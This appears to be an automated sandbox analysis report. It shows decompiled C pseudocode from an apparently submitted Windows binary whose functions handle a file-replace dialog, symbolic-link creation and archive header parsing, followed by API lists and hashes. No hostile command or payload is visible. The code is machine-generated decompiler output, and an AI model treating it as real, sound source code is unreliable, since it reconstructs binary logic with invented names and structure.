    							_t157 =  *0x88ce10;
    							if((_a304 & 0x00000010) == 0 || (_t157 | _t153) != 0) {
    								E00849E0C(_t157, _t153,  &_a212, 0x32);
    								_push(E0083DA8B(0x98));
    								E00833F53( &_a884, 0x200, L"%s %s",  &_a192);
    								_t177 = _t177 + 0x14;
    								SetDlgItemTextW(_t159, 0x69,  &_a884);
    							}
    						}
    						L27:
    						_t73 = 0;
    						L28:
    						return _t73;
    					}
    					if(_t163 != 1) {
    						goto L27;
    					}
    					_t169 = 2;
    					_t136 = (_t148 & 0x0000ffff) - _t169;
    					if(_t136 == 0) {
    						L11:
    						_push(6);
    						L12:
    						_pop(_t169);
    						L13:
    						_t137 = SendDlgItemMessageW(_t159, 0x66, 0x171, 0, 0);
    						if(_t137 != 0) {
    							 *0x86df4c(_t137);
    						}
    						EndDialog(_t159, _t169);
    						goto L1;
    					}
    					_t141 = _t136 - 0x6a;
    					if(_t141 == 0) {
    						_t169 = 0;
    						goto L13;
    					}
    					_t142 = _t141 - 1;
    					if(_t142 == 0) {
    						_t169 = 1;
    						goto L13;
    					}
    					_t143 = _t142 - 1;
    					if(_t143 == 0) {
    						_push(4);
    						goto L12;
    					}
    					_t144 = _t143 - 1;
    					if(_t144 == 0) {
    						goto L13;
    					}
    					_t145 = _t144 - 1;
    					if(_t145 == 0) {
    						_push(3);
    						goto L12;
    					}
    					if(_t145 != 1) {
    						goto L27;
    					}
    					goto L11;
    				}
    				L1:
    				_t73 = 1;
    				goto L28;
    			}



























    0x0084b014
    0x0084b019
    0x0084b01f
    0x0084b028
    0x0084b032
    0x0084b051
    0x0084b05b
    0x0084b061
    0x0084b0db
    0x0084b0f6
    0x0084b105
    0x0084b11b
    0x0084b138
    0x0084b14e
    0x0084b16a
    0x0084b16f
    0x0084b182
    0x0084b192
    0x0084b198
    0x0084b19e
    0x0084b19f
    0x0084b1a5
    0x0084b1a8
    0x0084b1af
    0x0084b1cd
    0x0084b1d7
    0x0084b1df
    0x0084b1fd
    0x0084b202
    0x0084b210
    0x0084b213
    0x0084b221
    0x0084b223
    0x0084b235
    0x0084b23d
    0x0084b23f
    0x0084b240
    0x0084b242
    0x0084b243
    0x0084b244
    0x0084b253
    0x0084b26e
    0x0084b273
    0x0084b281
    0x0084b281
    0x0084b297
    0x0084b29d
    0x0084b2a8
    0x0084b2b7
    0x0084b2c7
    0x0084b2e1
    0x0084b2f9
    0x0084b303
    0x0084b30b
    0x0084b32a
    0x0084b32f
    0x0084b33d
    0x0084b347
    0x0084b34d
    0x0084b353
    0x0084b367
    0x0084b376
    0x0084b38d
    0x0084b392
    0x0084b3a0
    0x0084b3a0
    0x0084b353
    0x0084b3a2
    0x0084b3a2
    0x0084b3a4
    0x0084b3ae
    0x0084b3ae
    0x0084b066
    0x00000000
    0x00000000
    0x0084b071
    0x0084b072
    0x0084b074
    0x0084b098
    0x0084b098
    0x0084b09a
    0x0084b09a
    0x0084b09b
    0x0084b0a5
    0x0084b0ad
    0x0084b0b0
    0x0084b0b0
    0x0084b0b8
    0x00000000
    0x0084b0b8
    0x0084b076
    0x0084b079
    0x0084b0cd
    0x00000000
    0x0084b0cd
    0x0084b07b
    0x0084b07e
    0x0084b0ca
    0x00000000
    0x0084b0ca
    0x0084b080
    0x0084b083
    0x0084b0c4
    0x00000000
    0x0084b0c4
    0x0084b085
    0x0084b088
    0x00000000
    0x00000000
    0x0084b08a
    0x0084b08d
    0x0084b0c0
    0x00000000
    0x0084b0c0
    0x0084b092
    0x00000000
    0x00000000
    0x00000000
    0x0084b092
    0x0084b053
    0x0084b055
    0x00000000

    APIs
      • Part of subcall function 008312D7: GetDlgItem.USER32(00000000,00003021), ref: 0083131B
      • Part of subcall function 008312D7: SetWindowTextW.USER32(00000000,008622E4), ref: 00831331
    • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0084B0A5
    • EndDialog.USER32(?,00000006), ref: 0084B0B8
    • GetDlgItem.USER32(?,0000006C), ref: 0084B0D4
    • SetFocus.USER32(00000000), ref: 0084B0DB
    • SetDlgItemTextW.USER32(?,00000065,?), ref: 0084B11B
    • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0084B14E
    • FindFirstFileW.KERNEL32(?,?), ref: 0084B164
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0084B182
    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0084B192
    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0084B1AF
    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0084B1CD
      • Part of subcall function 0083DA8B: LoadStringW.USER32(?,?,00000400,00000000), ref: 0083DAD5
      • Part of subcall function 0083DA8B: LoadStringW.USER32(?,?,00000400), ref: 0083DAEB
    • _swprintf.LIBCMT ref: 0084B1FD
      • Part of subcall function 00833F53: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00833F66
    • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0084B210
    • FindClose.KERNEL32(00000000), ref: 0084B213
    • _swprintf.LIBCMT ref: 0084B26E
    • SetDlgItemTextW.USER32(?,00000068,?), ref: 0084B281
    • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0084B297
    • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0084B2B7
    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0084B2C7
    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0084B2E1
    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0084B2F9
    • _swprintf.LIBCMT ref: 0084B32A
    • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0084B33D
    • _swprintf.LIBCMT ref: 0084B38D
    • SetDlgItemTextW.USER32(?,00000069,?), ref: 0084B3A0
      • Part of subcall function 00849E0C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00849E32
      • Part of subcall function 00849E0C: GetNumberFormatW.KERNEL32 ref: 00849E81
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLoadLocalStringSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
    • String ID: %s %s$%s %s %s$REPLACEFILEDLG
    • API String ID: 3227067027-1840816070
    • Opcode ID: fbb413c26390ea5bb680ac18f4b3aa0d41898048d70682de863fbf36f0bf58b0
    • Instruction ID: ae5ad8b0ba4732f5e58c77f86dfa73071dc25e494604058aea6787b0bc797bc8
    • Opcode Fuzzy Hash: fbb413c26390ea5bb680ac18f4b3aa0d41898048d70682de863fbf36f0bf58b0
    • Instruction Fuzzy Hash: CF918F72648348BBE221DBA4DC49FEB77ACFB8A704F014819F749D2181DBB1E6058762
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 83%
    			E008370B9(void* __ecx, void* __edx) {
    				void* __esi;
    				signed int _t111;
    				signed int _t113;
    				void* _t116;
    				int _t118;
    				intOrPtr _t121;
    				signed int _t139;
    				int _t145;
    				void* _t182;
    				void* _t185;
    				void* _t190;
    				short _t191;
    				void* _t197;
    				void* _t203;
    				void* _t204;
    				void* _t223;
    				void* _t224;
    				intOrPtr _t225;
    				intOrPtr _t227;
    				void* _t229;
    				WCHAR* _t230;
    				intOrPtr _t234;
    				short _t238;
    				void* _t239;
    				intOrPtr _t240;
    				short _t242;
    				void* _t243;
    				void* _t245;
    				void* _t246;
    
    				_t224 = __edx;
    				E0084D8C4(E008612F1, __ecx);
    				E0084D9C0();
    				 *((intOrPtr*)(_t243 - 0x18)) = 1;
    				if( *0x870043 == 0) {
    					E00837B08(L"SeRestorePrivilege");
    					E00837B08(L"SeCreateSymbolicLinkPrivilege");
    					 *0x870043 = 1;
    				}
    				_t200 = _t243 - 0x2c;
    				E0083134C(_t243 - 0x2c, 0x1418);
    				_t197 =  *(_t243 + 0x10);
    				 *(_t243 - 4) =  *(_t243 - 4) & 0x00000000;
    				E0083FAE7(_t243 - 0x107c, _t197 + 0x1104, 0x800);
    				 *((intOrPtr*)(_t243 - 0x10)) = E00852B93(_t243 - 0x107c);
    				_t233 = _t243 - 0x107c;
    				_t229 = _t243 - 0x207c;
    				_t111 = E00854DE5(_t243 - 0x107c, L"\\??\\", 4);
    				_t246 = _t245 + 0x10;
    				asm("sbb al, al");
    				_t113 =  ~_t111 + 1;
    				 *(_t243 - 0x14) = _t113;
    				if(_t113 != 0) {
    					_t233 = _t243 - 0x1074;
    					_t190 = E00854DE5(_t243 - 0x1074, L"UNC\\", 4);
    					_t246 = _t246 + 0xc;
    					if(_t190 == 0) {
    						_t191 = 0x5c;
    						 *((short*)(_t243 - 0x207c)) = _t191;
    						_t229 = _t243 - 0x207a;
    						_t233 = _t243 - 0x106e;
    					}
    				}
    				E00854DC3(_t229, _t233);
    				_t116 = E00852B93(_t243 - 0x207c);
    				_t234 =  *((intOrPtr*)(_t243 + 8));
    				_t230 =  *(_t243 + 0xc);
    				 *(_t243 + 0x10) = _t116;
    				if( *((char*)(_t234 + 0x618f)) != 0) {
    					L9:
    					_push(1);
    					_push(_t230);
    					E00839DDE(_t200, _t243);
    					if( *((char*)(_t197 + 0x10f1)) != 0 ||  *((char*)(_t197 + 0x2104)) != 0) {
    						_t118 = CreateDirectoryW(_t230, 0);
    						__eflags = _t118;
    						if(_t118 == 0) {
    							goto L27;
    						}
    						goto L14;
    					} else {
    						_t182 = CreateFileW(_t230, 0x40000000, 0, 0, 1, 0x80, 0);
    						if(_t182 == 0xffffffff) {
    							L27:
    							 *((char*)(_t243 - 0x18)) = 0;
    							L28:
    							E0083158D(_t243 - 0x2c);
    							 *[fs:0x0] =  *((intOrPtr*)(_t243 - 0xc));
    							return  *((intOrPtr*)(_t243 - 0x18));
    						}
    						CloseHandle(_t182);
    						L14:
    						_t121 =  *((intOrPtr*)(_t197 + 0x1100));
    						if(_t121 != 3) {
    							__eflags = _t121 - 2;
    							if(_t121 == 2) {
    								L18:
    								_t203 =  *(_t243 - 0x2c);
    								_t225 =  *((intOrPtr*)(_t243 - 0x10));
    								 *_t203 = 0xa000000c;
    								_t238 = _t225 + _t225;
    								 *((short*)(_t203 + 0xa)) = _t238;
    								 *((short*)(_t203 + 4)) = 0x10 + ( *(_t243 + 0x10) + _t225) * 2;
    								 *((intOrPtr*)(_t203 + 6)) = 0;
    								E00854DC3(_t203 + 0x14, _t243 - 0x107c);
    								_t60 = _t238 + 2; // 0x3
    								_t239 =  *(_t243 - 0x2c);
    								 *((short*)(_t239 + 0xc)) = _t60;
    								 *((short*)(_t239 + 0xe)) =  *(_t243 + 0x10) +  *(_t243 + 0x10);
    								E00854DC3(_t239 + ( *((intOrPtr*)(_t243 - 0x10)) + 0xb) * 2, _t243 - 0x207c);
    								_t139 =  *(_t243 - 0x14) & 0x000000ff ^ 0x00000001;
    								__eflags = _t139;
    								 *(_t239 + 0x10) = _t139;
    								L19:
    								_t204 = CreateFileW(_t230, 0xc0000000, 0, 0, 3, 0x2200000, 0);
    								 *(_t243 + 0x10) = _t204;
    								if(_t204 == 0xffffffff) {
    									goto L27;
    								}
    								_t145 = DeviceIoControl(_t204, 0x900a4, _t239, ( *(_t239 + 4) & 0x0000ffff) + 8, 0, 0, _t243 - 0x30, 0);
    								_t263 = _t145;
    								if(_t145 != 0) {
    									E008394D4(_t243 - 0x30a0);
    									 *(_t243 - 4) = 1;
    									 *((intOrPtr*)( *((intOrPtr*)(_t243 - 0x30a0)) + 8))();
    									_t240 =  *((intOrPtr*)(_t243 + 8));
    									 *(_t243 - 0x309c) =  *(_t243 + 0x10);
    									asm("sbb ecx, ecx");
    									asm("sbb ecx, ecx");
    									asm("sbb ecx, ecx");
    									E00839B22(_t243 - 0x30a0, _t240,  ~( *(_t240 + 0x72c8)) & _t197 + 0x00001040,  ~( *(_t240 + 0x72cc)) & _t197 + 0x00001048,  ~( *(_t240 + 0x72d0)) & _t197 + 0x00001050);
    									E00839572(_t243 - 0x30a0);
    									__eflags =  *((char*)(_t240 + 0x61a0));
    									if( *((char*)(_t240 + 0x61a0)) == 0) {
    										E0083A1D3(_t230,  *((intOrPtr*)(_t197 + 0x24)));
    									}
    									E00839506(_t243 - 0x30a0);
    									goto L28;
    								}
    								CloseHandle( *(_t243 + 0x10));
    								E00831F29(_t263, 0x15, 0, _t230);
    								_t160 = GetLastError();
    								if(_t160 == 5 || _t160 == 0x522) {
    									if(E0083FCB1() == 0) {
    										E00831558(_t243 - 0x7c, 0x18);
    										_t160 = E00840AC7(_t243 - 0x7c);
    									}
    								}
    								E0084E76A(_t160);
    								E00836F18(0x8700e0, 9);
    								_push(_t230);
    								if( *((char*)(_t197 + 0x10f1)) == 0) {
    									DeleteFileW();
    								} else {
    									RemoveDirectoryW();
    								}
    								goto L27;
    							}
    							__eflags = _t121 - 1;
    							if(_t121 != 1) {
    								goto L27;
    							}
    							goto L18;
    						}
    						_t223 =  *(_t243 - 0x2c);
    						_t227 =  *((intOrPtr*)(_t243 - 0x10));
    						 *_t223 = 0xa0000003;
    						_t242 = _t227 + _t227;
    						 *((short*)(_t223 + 0xa)) = _t242;
    						 *((short*)(_t223 + 4)) = 0xc + ( *(_t243 + 0x10) + _t227) * 2;
    						 *((intOrPtr*)(_t223 + 6)) = 0;
    						E00854DC3(_t223 + 0x10, _t243 - 0x107c);
    						_t40 = _t242 + 2; // 0x3
    						_t239 =  *(_t243 - 0x2c);
    						 *((short*)(_t239 + 0xc)) = _t40;
    						 *((short*)(_t239 + 0xe)) =  *(_t243 + 0x10) +  *(_t243 + 0x10);
    						E00854DC3(_t239 + ( *((intOrPtr*)(_t243 - 0x10)) + 9) * 2, _t243 - 0x207c);
    						goto L19;
    					}
    				}
    				if( *(_t243 - 0x14) != 0) {
    					goto L27;
    				}
    				_t185 = E0083B58F(_t197 + 0x1104);
    				_t256 = _t185;
    				if(_t185 != 0) {
    					goto L27;
    				}
    				_push(_t197 + 0x1104);
    				_push(_t230);
    				_push(_t197 + 0x28);
    				_push(_t234);
    				if(E008378EA(_t224, _t256) == 0) {
    					goto L27;
    				}
    				goto L9;
    			}
































    0x008370b9
    0x008370be
    0x008370c8
    0x008370da
    0x008370dd
    0x008370e4
    0x008370ee
    0x008370f3
    0x008370f3
    0x008370fe
    0x00837101
    0x00837106
    0x00837109
    0x00837120
    0x00837133
    0x00837136
    0x0083713e
    0x0083714a
    0x0083714f
    0x00837154
    0x00837156
    0x00837158
    0x0083715d
    0x00837161
    0x0083716f
    0x00837174
    0x00837179
    0x0083717d
    0x0083717e
    0x00837185
    0x0083718b
    0x0083718b
    0x00837179
    0x00837193
    0x0083719f
    0x008371a4
    0x008371aa
    0x008371ad
    0x008371b7
    0x008371f1
    0x008371f4
    0x008371f5
    0x008371f6
    0x00837202
    0x00837239
    0x0083723f
    0x00837241
    0x00000000
    0x00000000
    0x00000000
    0x0083720d
    0x0083721e
    0x00837227
    0x008373e7
    0x008373e7
    0x008373eb
    0x008373ee
    0x008373fc
    0x00837406
    0x00837406
    0x0083722e
    0x00837247
    0x00837247
    0x00837250
    0x008372b8
    0x008372bb
    0x008372c5
    0x008372c5
    0x008372c8
    0x008372d0
    0x008372d6
    0x008372d9
    0x008372e4
    0x008372ea
    0x008372f8
    0x008372fd
    0x00837300
    0x00837303
    0x0083730c
    0x00837321
    0x0083732f
    0x0083732f
    0x00837332
    0x00837335
    0x0083734d
    0x0083734f
    0x00837355
    0x00000000
    0x00000000
    0x00837373
    0x00837379
    0x0083737b
    0x00837417
    0x00837428
    0x0083742c
    0x0083742f
    0x00837435
    0x00837449
    0x0083745c
    0x0083746f
    0x0083747a
    0x00837485
    0x0083748a
    0x00837491
    0x00837497
    0x00837497
    0x008374a2
    0x00000000
    0x008374a2
    0x00837385
    0x00837390
    0x00837395
    0x0083739e
    0x008373ae
    0x008373b5
    0x008373bd
    0x008373bd
    0x008373ae
    0x008373c9
    0x008373d2
    0x008373de
    0x008373df
    0x00837409
    0x008373e1
    0x008373e1
    0x008373e1
    0x00000000
    0x008373df
    0x008372bd
    0x008372bf
    0x00000000
    0x00000000
    0x00000000
    0x008372bf
    0x00837252
    0x00837255
    0x0083725d
    0x00837263
    0x00837266
    0x00837271
    0x00837277
    0x00837285
    0x0083728a
    0x0083728d
    0x00837290
    0x00837299
    0x008372ae
    0x00000000
    0x008372b3
    0x00837202
    0x008371bd
    0x00000000
    0x00000000
    0x008371ca
    0x008371cf
    0x008371d1
    0x00000000
    0x00000000
    0x008371dd
    0x008371de
    0x008371e2
    0x008371e3
    0x008371eb
    0x00000000
    0x00000000
    0x00000000

    APIs
    • __EH_prolog.LIBCMT ref: 008370BE
    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 0083721E
    • CloseHandle.KERNEL32(00000000), ref: 0083722E
      • Part of subcall function 00837B08: GetCurrentProcess.KERNEL32(00000020,?), ref: 00837B17
      • Part of subcall function 00837B08: GetLastError.KERNEL32 ref: 00837B5D
      • Part of subcall function 00837B08: CloseHandle.KERNEL32(?), ref: 00837B6C
    • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 00837239
    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00837347
    • DeviceIoControl.KERNEL32 ref: 00837373
    • CloseHandle.KERNEL32(?), ref: 00837385
    • GetLastError.KERNEL32(00000015,00000000,?), ref: 00837395
    • RemoveDirectoryW.KERNEL32(?), ref: 008373E1
    • DeleteFileW.KERNEL32(?), ref: 00837409
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
    • API String ID: 3935142422-3508440684
    • Opcode ID: e4505bbb3e36a0413c8ba9276ee1cf558b7938765830e782fbe0088b136ee068
    • Instruction ID: 003e18fa8f2ae9edd6fa393dc49e2f1ef380c1b864231f95985dae4d9d5603e0
    • Opcode Fuzzy Hash: e4505bbb3e36a0413c8ba9276ee1cf558b7938765830e782fbe0088b136ee068
    • Instruction Fuzzy Hash: C5B1C0B19046189BDB21DF68CC85BEE77B8FF44300F0445A9F95AE7242D770EA45CBA2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 84%
    			E0083320E(intOrPtr* __ecx, void* __eflags) {
    				void* __ebp;
    				void* _t239;
    				signed int _t242;
    				void* _t248;
    				unsigned int _t250;
    				signed int _t254;
    				signed int _t255;
    				unsigned int _t256;
    				void* _t257;
    				char _t270;
    				signed int _t289;
    				unsigned int _t290;
    				intOrPtr _t291;
    				signed int _t292;
    				signed int _t295;
    				char _t302;
    				signed char _t304;
    				signed int _t320;
    				signed int _t331;
    				signed int _t335;
    				signed int _t350;
    				signed char _t352;
    				unsigned int _t362;
    				void* _t378;
    				void* _t380;
    				void* _t381;
    				void* _t392;
    				intOrPtr* _t394;
    				signed int _t409;
    				signed int _t419;
    				char _t431;
    				signed int _t432;
    				signed int _t437;
    				signed int _t441;
    				intOrPtr _t449;
    				unsigned int _t455;
    				unsigned int _t458;
    				signed int _t462;
    				signed int _t470;
    				signed int _t479;
    				signed int _t484;
    				signed int _t498;
    				intOrPtr _t499;
    				signed int _t500;
    				signed char _t501;
    				unsigned int _t502;
    				void* _t509;
    				void* _t517;
    				signed int _t520;
    				void* _t521;
    				signed int _t531;
    				unsigned int _t534;
    				void* _t539;
    				intOrPtr _t543;
    				void* _t544;
    				void* _t545;
    				void* _t546;
    				intOrPtr _t556;
    
    				_t546 = _t545 - 0x68;
    				E0084D8C4(E0086122D, __ecx);
    				E0084D9C0();
    				_t394 = __ecx;
    				E0083C2C0(_t544 + 0x30, __ecx);
    				 *(_t544 + 0x60) = 0;
    				 *((intOrPtr*)(_t544 - 4)) = 0;
    				if( *((intOrPtr*)(__ecx + 0x6cbc)) == 0) {
    					L15:
    					 *((char*)(_t544 + 0x6a)) = 0;
    					L16:
    					_t239 = E0083C4CB(_t498, 7);
    					_t565 = _t239 - 7;
    					if(_t239 >= 7) {
    						 *(_t394 + 0x21f4) = 0;
    						_t509 = _t394 + 0x21e4;
    						 *_t509 = E0083C33B(_t544 + 0x30);
    						_t531 = E0083C4A7(_t544 + 0x30, 4);
    						_t242 = E0083C43B(_t498);
    						__eflags = _t242 | _t498;
    						if((_t242 | _t498) == 0) {
    							L85:
    							E00831FE3(_t394);
    							L86:
    							E0083158D(_t544 + 0x30);
    							 *[fs:0x0] =  *((intOrPtr*)(_t544 - 0xc));
    							return  *(_t544 + 0x60);
    						}
    						__eflags = _t531;
    						if(_t531 == 0) {
    							goto L85;
    						}
    						_t42 = _t531 - 3; // -3
    						_t534 = _t531 + 4 + _t242;
    						_t409 = _t42 + _t242;
    						__eflags = _t409;
    						 *(_t544 + 0x64) = _t534;
    						if(_t409 < 0) {
    							goto L85;
    						}
    						__eflags = _t534 - 7;
    						if(_t534 < 7) {
    							goto L85;
    						}
    						E0083C4CB(_t498, _t409);
    						__eflags =  *(_t544 + 0x48) - _t534;
    						if(__eflags < 0) {
    							goto L17;
    						}
    						_t248 = E0083C41B(_t544 + 0x30);
    						 *(_t394 + 0x21e8) = E0083C43B(_t498);
    						_t250 = E0083C43B(_t498);
    						 *(_t394 + 0x21ec) = _t250;
    						__eflags =  *_t509 - _t248;
    						 *(_t394 + 0x21f4) = _t250 >> 0x00000002 & 0x00000001;
    						 *(_t394 + 0x21f0) =  *(_t544 + 0x64);
    						_t254 =  *(_t394 + 0x21e8);
    						 *(_t394 + 0x21dc) = _t254;
    						_t255 = _t254 & 0xffffff00 |  *_t509 != _t248;
    						 *(_t544 + 0x6b) = _t255;
    						__eflags = _t255;
    						if(_t255 == 0) {
    							L26:
    							_t256 = 0;
    							__eflags =  *(_t394 + 0x21ec) & 0x00000001;
    							 *(_t544 + 0x58) = 0;
    							 *(_t544 + 0x54) = 0;
    							if(( *(_t394 + 0x21ec) & 0x00000001) == 0) {
    								L30:
    								__eflags =  *(_t394 + 0x21ec) & 0x00000002;
    								_t536 = _t256;
    								 *(_t544 + 0x64) = _t256;
    								 *(_t544 + 0x5c) = _t256;
    								if(( *(_t394 + 0x21ec) & 0x00000002) != 0) {
    									_t362 = E0083C43B(_t498);
    									_t536 = _t362;
    									 *(_t544 + 0x64) = _t362;
    									 *(_t544 + 0x5c) = _t498;
    								}
    								_t257 = E008318D9(_t394,  *(_t394 + 0x21f0));
    								_t499 = 0;
    								asm("adc eax, edx");
    								 *((intOrPtr*)(_t394 + 0x6ca8)) = E00833DB9( *((intOrPtr*)(_t394 + 0x6ca0)) + _t257,  *((intOrPtr*)(_t394 + 0x6ca4)), _t536,  *(_t544 + 0x5c), _t499, _t499);
    								 *((intOrPtr*)(_t394 + 0x6cac)) = _t499;
    								_t500 =  *(_t394 + 0x21e8);
    								__eflags = _t500 - 1;
    								if(__eflags == 0) {
    									E0083AA10(_t394 + 0x2208);
    									_t419 = 5;
    									memcpy(_t394 + 0x2208, _t509, _t419 << 2);
    									_t501 = E0083C43B(_t500);
    									 *(_t394 + 0x6cb5) = _t501 & 1;
    									 *(_t394 + 0x6cb4) = _t501 >> 0x00000002 & 1;
    									 *(_t394 + 0x6cb7) = _t501 >> 0x00000004 & 1;
    									_t431 = 1;
    									 *((char*)(_t394 + 0x6cba)) = 1;
    									 *(_t394 + 0x6cbb) = _t501 >> 0x00000003 & 1;
    									_t270 = 0;
    									 *((char*)(_t394 + 0x6cb8)) = 0;
    									__eflags = _t501 & 0x00000002;
    									if((_t501 & 0x00000002) == 0) {
    										 *((intOrPtr*)(_t394 + 0x6cd8)) = 0;
    									} else {
    										 *((intOrPtr*)(_t394 + 0x6cd8)) = E0083C43B(_t501);
    										_t270 = 0;
    										_t431 = 1;
    									}
    									__eflags =  *(_t394 + 0x6cb5);
    									if( *(_t394 + 0x6cb5) == 0) {
    										L81:
    										_t431 = _t270;
    										goto L82;
    									} else {
    										__eflags =  *((intOrPtr*)(_t394 + 0x6cd8)) - _t270;
    										if( *((intOrPtr*)(_t394 + 0x6cd8)) == _t270) {
    											L82:
    											 *((char*)(_t394 + 0x6cb9)) = _t431;
    											_t432 =  *(_t544 + 0x58);
    											__eflags = _t432 |  *(_t544 + 0x54);
    											if((_t432 |  *(_t544 + 0x54)) != 0) {
    												E008320F7(_t394, _t544 + 0x30, _t432, _t394 + 0x2208);
    											}
    											L84:
    											 *(_t544 + 0x60) =  *(_t544 + 0x48);
    											goto L86;
    										}
    										goto L81;
    									}
    								}
    								if(__eflags <= 0) {
    									goto L84;
    								}
    								__eflags = _t500 - 3;
    								if(_t500 <= 3) {
    									__eflags = _t500 - 2;
    									_t120 = (0 | _t500 != 0x00000002) - 1; // -1
    									_t517 = (_t120 & 0xffffdcb0) + 0x45d0 + _t394;
    									 *(_t544 + 0x2c) = _t517;
    									E0083A976(_t517, 0);
    									_t437 = 5;
    									memcpy(_t517, _t394 + 0x21e4, _t437 << 2);
    									_t539 =  *(_t544 + 0x2c);
    									 *(_t544 + 0x60) =  *(_t394 + 0x21e8);
    									 *(_t539 + 0x1058) =  *(_t544 + 0x64);
    									 *((char*)(_t539 + 0x10f9)) = 1;
    									 *(_t539 + 0x105c) =  *(_t544 + 0x5c);
    									 *(_t539 + 0x1094) = E0083C43B(_t500);
    									 *(_t539 + 0x1060) = E0083C43B(_t500);
    									_t289 =  *(_t539 + 0x1094) >> 0x00000003 & 0x00000001;
    									__eflags = _t289;
    									 *(_t539 + 0x1064) = _t500;
    									 *(_t539 + 0x109a) = _t289;
    									if(_t289 != 0) {
    										 *(_t539 + 0x1060) = 0x7fffffff;
    										 *(_t539 + 0x1064) = 0x7fffffff;
    									}
    									_t441 =  *(_t539 + 0x105c);
    									_t520 =  *(_t539 + 0x1064);
    									_t290 =  *(_t539 + 0x1058);
    									_t502 =  *(_t539 + 0x1060);
    									__eflags = _t441 - _t520;
    									if(__eflags < 0) {
    										L51:
    										_t290 = _t502;
    										_t441 = _t520;
    										goto L52;
    									} else {
    										if(__eflags > 0) {
    											L52:
    											 *(_t539 + 0x106c) = _t441;
    											 *(_t539 + 0x1068) = _t290;
    											_t291 = E0083C43B(_t502);
    											__eflags =  *(_t539 + 0x1094) & 0x00000002;
    											 *((intOrPtr*)(_t539 + 0x24)) = _t291;
    											if(( *(_t539 + 0x1094) & 0x00000002) != 0) {
    												E00840A4D(_t539 + 0x1040, _t502, E0083C33B(_t544 + 0x30), 0);
    											}
    											 *(_t539 + 0x1070) =  *(_t539 + 0x1070) & 0x00000000;
    											__eflags =  *(_t539 + 0x1094) & 0x00000004;
    											if(( *(_t539 + 0x1094) & 0x00000004) != 0) {
    												 *(_t539 + 0x1070) = 2;
    												 *((intOrPtr*)(_t539 + 0x1074)) = E0083C33B(_t544 + 0x30);
    											}
    											 *(_t539 + 0x1100) =  *(_t539 + 0x1100) & 0x00000000;
    											_t292 = E0083C43B(_t502);
    											 *(_t544 + 0x64) = _t292;
    											 *(_t539 + 0x20) = _t292 >> 0x00000007 & 0x00000007;
    											_t449 = (_t292 & 0x0000003f) + 0x32;
    											 *((intOrPtr*)(_t539 + 0x1c)) = _t449;
    											__eflags = _t449 - 0x32;
    											if(_t449 != 0x32) {
    												 *((intOrPtr*)(_t539 + 0x1c)) = 0x270f;
    											}
    											 *((char*)(_t539 + 0x18)) = E0083C43B(_t502);
    											_t521 = E0083C43B(_t502);
    											 *(_t539 + 0x10fc) = 2;
    											_t295 =  *((intOrPtr*)(_t539 + 0x18));
    											 *(_t539 + 0x10f8) =  *(_t394 + 0x21ec) >> 0x00000006 & 1;
    											__eflags = _t295 - 1;
    											if(_t295 != 1) {
    												__eflags = _t295;
    												if(_t295 == 0) {
    													_t177 = _t539 + 0x10fc;
    													 *_t177 =  *(_t539 + 0x10fc) & 0x00000000;
    													__eflags =  *_t177;
    												}
    											} else {
    												 *(_t539 + 0x10fc) = 1;
    											}
    											_t455 =  *(_t539 + 8);
    											 *(_t539 + 0x1098) = _t455 >> 0x00000003 & 1;
    											 *(_t539 + 0x10fa) = _t455 >> 0x00000005 & 1;
    											__eflags =  *(_t544 + 0x60) - 2;
    											_t458 =  *(_t544 + 0x64);
    											 *(_t539 + 0x1099) = _t455 >> 0x00000004 & 1;
    											if( *(_t544 + 0x60) != 2) {
    												L65:
    												_t302 = 0;
    												__eflags = 0;
    												goto L66;
    											} else {
